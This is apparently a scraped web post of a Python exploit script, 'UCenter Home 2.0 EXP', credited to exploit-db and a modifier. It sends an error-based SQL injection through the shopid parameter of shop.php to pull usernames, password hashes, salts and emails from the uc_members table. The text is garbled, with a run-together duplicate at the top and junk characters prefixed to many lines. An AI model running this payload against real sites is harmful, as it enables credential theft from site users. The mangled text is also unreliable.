UCenter Home 2.0 EXP

admin

#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl


: N0 I8 S, j& t$ M( l#!/usr/bin/env python  

import sys  
5 h+ \" m* n4 z# wimport urllib2  
import re  

' m6 I. J6 o; m# Y) v) idef info():  
( V" ^0 M+ I) ?    print 'From:http://www.exploit-db.com/exploits/14997/'
! `/ o, g( }5 P  p; ^: l7 S    print 'http://www.hake.cc/Web_loudong/'
" n" D# s8 O; P0 C    print 'changed:qiaoy'  
    print 'exp:'  
8 _/ Z( ~& Q# V( H4 b8 \6 \3 v    print ' ./UCenter_Home_2.0.py site'  

def main():  
    if len(sys.argv) != 2:  
        info()  
    else:  
        site = sys.argv[1]  
        if site[0:7] == 'http://':  
2 Z8 n0 N- q5 ^2 G. ]6 R0 l            sitesite =site  
        elif site[0:8] == 'https://':  
            sitesite = site  
4 T$ t8 U9 l. u# L( F, [% T        else:  
% u3 S, ?9 Q  G8 [' {$ ~            site = 'http://'+site  
        try:  
            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  
            Value = urllib2.urlopen(url).read()  
$ T7 a2 n. v+ z            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  
            hacked = Msg.split(':')  
            print 'Name:    '+hacked[1]  
            print 'Passwd:  '+hacked[2]  
            print 'salt:    '+hacked[3]  
& [/ D2 o/ N* r5 j            print 'email:   '+hacked[4]  
        except:  
  ~5 Y' Z4 m- q- x) }0 \1 q            print 'Sorry,I can\'t work............'  
1 F: q' S% i: G2 S0 P# k8 {
if __name__ == '__main__':  
$ j/ b7 u( M7 P* I8 J* H& f4 N( U    main()